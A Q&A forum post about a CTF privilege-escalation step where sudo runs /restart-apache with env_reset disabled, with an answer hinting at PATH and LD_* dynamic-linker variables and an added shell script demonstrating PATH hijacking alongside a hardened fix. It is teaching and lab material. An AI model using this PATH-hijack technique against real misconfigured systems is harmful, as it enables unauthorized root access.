I am doing a CTF and I am in the last step of it: privilege escalation. With the sudo -l
command, the output was this:
Matching Defaults entries for nick on 192:
always_set_home, !env_reset, env_keep="LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_ATIME LC_ALL LANGUAGE LINGUAS XDG_SESSION_COOKIE",!insults, targetpw
User nick may run the following commands on 192:
(ALL) ALL
(root) NOPASSWD: /restart-apache
I know that env_reset shouldn't be disabled but I can't figure out the way to use it to get root access!
$ file restart-apache
restart-apache: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, BuildID[sha1]=1b1a4ab278b2d1be83e8b14adfc358cfd277d655, for GNU/Linux 3.2.0, with debug_info, not stripped
Best Answer
From the sudoers man page:
So, you can insert arbitrary environment variables into the launched process.
You don't show what sort of a program /restart-apache is, but if it just so happens to be a shell script, this should be easy. Can you think of any environment variables that would affect what it does? What happens, exactly, when a shell script runs pretty much any command? Where does it find it?

Ok, turns out I didn't get lucky, and it was an actual compiled program instead, so it probably doesn't run that many commands via PATH. It still might, but it's hard to count on that.
That output from file looks like it might be truncated: the output I get from file /bin/ls is this (split to multiple lines):

(The full path to the interpreter is missing from the output in the question.)
If your program uses ld-linux-x86-64.so.2, as all "normal" dynamic executables do, we can start looking at what actually happens when you run such a program. E.g. from here: What is /lib64/ld-linux-x86-64.so.2 and why can it be used to execute file?

Spoiler: the program itself isn't what first runs.
We also find the man page of the dynamic linker. That man page lists some interesting environment variables, which affect the way the program is set up when started, the ones with names like LD_*. You may need to do some coding to get it to do what you want.
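The PATH angle that the answer raises first is the one most worth checking, because it survives sudo's filtering: the Defaults shown in the question contain no secure_path, and PATH is not on sudo's default removal list, so with env_reset off the caller's PATH reaches the target as-is. The script below is an added illustration, not code from the question, the answer or the CTF: "restart-apache" here is a constructed shell stand-in for the real compiled binary, the hijack directory and the HIJACK_LOG variable are made up for the demo, and env(1) plays the role of "sudo /restart-apache" so that everything runs unprivileged.

```shell
#!/bin/sh
# Added illustration (not code from the question or the answer): with env_reset
# off and no secure_path in the Defaults shown, sudo hands the caller's PATH to
# the target. If the target runs any command by bare name, the caller chooses
# what that name resolves to. "restart-apache" below is a constructed shell
# script standing in for the CTF's binary, so the whole demo runs unprivileged.

set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Stand-in target: invokes apachectl unqualified. A C program that calls
# system("apachectl graceful") behaves the same way, because system(3) runs the
# string through /bin/sh -c, which searches PATH.
cat > "$WORK/restart-apache" <<'EOF'
#!/bin/sh
apachectl graceful
EOF
chmod 755 "$WORK/restart-apache"

# Hardened stand-in: same program, but it resets PATH before doing anything.
# (Setting secure_path in sudoers achieves the same from the sudo side.)
cat > "$WORK/restart-apache.fixed" <<'EOF'
#!/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
export PATH
apachectl graceful
EOF
chmod 755 "$WORK/restart-apache.fixed"

# Caller-controlled directory holding a fake apachectl. Instead of touching
# Apache it records the uid it ran as (this would be uid 0 under the real
# sudo rule). HIJACK_LOG is a made-up variable used only by this demo.
mkdir -p "$WORK/hijack"
cat > "$WORK/hijack/apachectl" <<'EOF'
#!/bin/sh
printf 'hijacked apachectl ran as uid=%s args=%s\n' "$(id -u)" "$*" > "$HIJACK_LOG"
EOF
chmod 755 "$WORK/hijack/apachectl"

# Run one of the stand-ins with a chosen PATH and report whether the fake ran.
# env(1) stands in for "sudo /restart-apache" with !env_reset: the environment,
# PATH included, reaches the target unchanged.
run_target() {
    target=$1
    path=$2
    log="$WORK/hijack.log"
    rm -f "$log"
    env HIJACK_LOG="$log" PATH="$path" "$WORK/$target" >/dev/null 2>&1 || true
    if [ -f "$log" ]; then cat "$log"; else echo "no hijack"; fi
}

# Attack: our directory comes first in PATH, so "apachectl" resolves to the fake.
demo_attack() {
    run_target restart-apache "$WORK/hijack:/usr/sbin:/usr/bin:/bin"
}

# Same PATH against the hardened stand-in: it discards the caller's PATH, so the
# fake is never found (apachectl is either the system one or "not found").
demo_hardened() {
    run_target restart-apache.fixed "$WORK/hijack:/usr/sbin:/usr/bin:/bin"
}

echo "attack:   $(demo_attack)"
echo "hardened: $(demo_hardened)"
```

Whether this applies to the real binary depends on it ever going through PATH. Since file reports it as not stripped and with debug info, the symbol table is there: nm /restart-apache | grep -E ' U (system|popen|execvp|execlp)' lists the libc calls that resolve a bare command name through PATH, and strings -a /restart-apache | grep -iE 'apache|service|systemctl' shows the command strings it passes to them. If neither turns up anything, PATH is a dead end. Before spending time on the LD_* variables from ld.so(8) instead, check what sudo actually lets through: sudo -V, run as root, prints the "Environment variables to remove" list, and on a stock configuration it contains LD_* even when env_reset is off; in addition, ld.so ignores LD_PRELOAD and LD_LIBRARY_PATH in secure-execution mode, which is how it runs sudo itself, so those names must reach the root process by some other route than the caller's environment.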